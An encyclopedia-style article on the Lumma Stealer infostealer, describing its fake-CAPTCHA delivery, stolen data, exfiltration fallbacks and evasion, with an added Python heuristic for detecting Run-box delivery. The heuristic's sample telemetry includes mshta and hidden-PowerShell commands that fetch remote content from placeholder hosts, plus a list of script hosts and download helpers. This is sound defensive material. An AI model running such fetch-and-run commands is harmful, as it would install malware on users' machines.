Lumma Stealer

Alias: LummaC2
Authors: "Shamel" [1]
Technical details
Written in: C++, ASM

Lumma Stealer is an infostealer malware as a service program developed for Microsoft Windows.


Technical overview

Lumma Stealer is distributed by affiliates through a number of campaigns, including phishing emails, malicious advertisements posing as legitimate downloads, and compromised websites. It is frequently associated with fake CAPTCHA pages, which prompt the user to paste a command into the Windows Run box. [2] It steals data from a number of programs, including web browsers, cryptocurrency wallets and chat applications, as well as user files. [3] The exfiltrated data is sent to a number of hardcoded command-and-control servers, falling back to Telegram, Dropbox and Steam if those servers are unreachable. [4]
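The "paste this into the Run box" delivery chain described above leaves a recognisable process-tree footprint: a script host or download helper started directly by explorer.exe with a remote URL on its command line. The following detection heuristic is an added example written for this article; it is not code from the original page or from any of the cited vendors. It runs over a handful of constructed process-creation records in a simple key=value format (the field names are modelled on Sysmon Event ID 1, but the records and their format are assumptions made here, not real telemetry), and scores each record so that an interactive PowerShell prompt or a browser opening a URL is not flagged while a script host fetching remote content from the shell is.

```python
"""Heuristic detection for Run-box ("fake CAPTCHA") delivery chains.

Added example, not part of the original article. Input records are
constructed for this example; field names loosely follow Sysmon Event ID 1
(process creation) but the key=value layout is an assumption made here.
"""
import re

# Script hosts and download helpers that a pasted Run-box command typically starts.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
    "curl.exe", "certutil.exe", "bitsadmin.exe",
}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')   # key=value or key="quoted value"

# Constructed sample telemetry (assumed format). Hostnames and users are placeholders.
SAMPLE_LOG = r"""
ts=2025-07-11T10:02:13Z image=C:\Windows\explorer.exe parent=C:\Windows\System32\userinit.exe user=WS01\alice cmdline="C:\Windows\explorer.exe"
ts=2025-07-11T10:05:41Z image=C:\Windows\System32\mshta.exe parent=C:\Windows\explorer.exe user=WS01\alice cmdline="mshta https://captcha-check.example/verify"
ts=2025-07-11T10:07:02Z image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\explorer.exe user=WS01\alice cmdline="powershell -c Get-Date"
ts=2025-07-11T10:09:15Z image=C:\Program Files\Google\Chrome\Application\chrome.exe parent=C:\Windows\explorer.exe user=WS01\alice cmdline="chrome.exe https://intranet.example/"
ts=2025-07-11T10:11:30Z image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\System32\cmd.exe user=WS01\alice cmdline="powershell -Command Get-Process"
ts=2025-07-11T10:13:58Z image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\explorer.exe user=WS01\bob cmdline="powershell -w hidden -c iwr https://verify-human.example/x"
"""


def parse_record(line: str) -> dict:
    """Parse one key=value record into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_record(rec: dict) -> tuple[int, list[str]]:
    """Score one process-creation record; higher means more Run-box-like."""
    score, reasons = 0, []
    image = basename(rec.get("image", ""))
    parent = basename(rec.get("parent", ""))
    cmdline = rec.get("cmdline", "")

    # Script host started straight from the shell: consistent with a Run-box paste.
    if image in SCRIPT_HOSTS and parent == "explorer.exe":
        score += 2
        reasons.append(f"{image} launched directly from explorer.exe")
    # Remote content referenced on the command line.
    if URL_RE.search(cmdline):
        score += 2
        reasons.append("remote URL in command line")
    # Interpreter spawning another interpreter (weaker signal on its own).
    if image in SCRIPT_HOSTS and parent in SCRIPT_HOSTS:
        score += 1
        reasons.append(f"interpreter chain {parent} -> {image}")
    return score, reasons


def find_suspicious(log_text: str, threshold: int = 3) -> list[dict]:
    """Return every record whose score reaches the threshold, with its reasons."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        score, reasons = score_record(rec)
        if score >= threshold:
            hits.append({**rec, "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["ts"], hit["user"], basename(hit["image"]), hit["score"], "; ".join(hit["reasons"]))
```

Only the two records that combine a shell-spawned script host with a remote URL reach the threshold; the interactive `Get-Date` prompt and the browser opening an intranet URL each score 2 and are not reported. In a real deployment the same logic applies to Sysmon Event ID 1 or Security event 4688 (with parent process logging enabled), and the `RunMRU` key under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer` records what users actually typed into the Run box, which is a useful corroborating artifact during triage.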

Lumma Stealer employs advanced obfuscation techniques, and uses process hollowing to impersonate legitimate programs in order to evade detection. It delays detonation until a sufficient amount of human-like activity has occurred. [5] Rather than calling the Windows API, it issues direct system calls. [6]

History

Lumma is believed to have first appeared on cybercrime forums in 2022. [7]

From March to May 2025, Microsoft identified 394,000 computers infected with Lumma. [8] In 2025, Lumma was the second most common sample uploaded to ANY.RUN, and the third most common on MalwareBazaar. [9] [10] In May 2025, Microsoft announced the seizure of 2,300 domains associated with Lumma through a vulnerability. [11] While Lumma's operators have continued their operation, it is believed that this may have damaged their reputation. [12]

References

  1. "The Rise of MaaS & Lumma Info Stealer". www.darktrace.com. Retrieved 2025-07-11.
  2. "Behind the CAPTCHA: A Clever Gateway of Malware".
  3. "Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer". Microsoft Security Blog. 2025-05-21. Retrieved 2025-07-11.
  4. Cybereason Security Services Team. "Your Data Is Under New Lummanagement: The Rise of LummaStealer". www.cybereason.com. Retrieved 2025-07-11.
  5. akerr (2023-11-20). "Analyzing LummaC2 stealer's novel Anti-Sandbox technique: Leveraging trigonometry for human behavior detection". Outpost24. Retrieved 2025-07-11.
  6. "A Deep Dive Into Malicious Direct Syscall Detection". Palo Alto Networks Blog. 2024-02-13. Retrieved 2025-07-11.
  7. "Lumma Stealer Is Out… of Business!". Bitsight. Retrieved 2025-07-11.
  8. Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues. Retrieved 2025-07-11.
  9. "Malware Trends Tracker | ANY.RUN". Malware Trends Tracker | ANY.RUN. Retrieved 2025-07-11.
  10. "The Spamhaus Project". www.spamhaus.org. Retrieved 2025-07-11.
  11. Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues. Retrieved 2025-07-11.
  12. "LummaC2 Fractures as Acreed Malware Becomes Top Dog". www.darkreading.com. Retrieved 2025-07-11.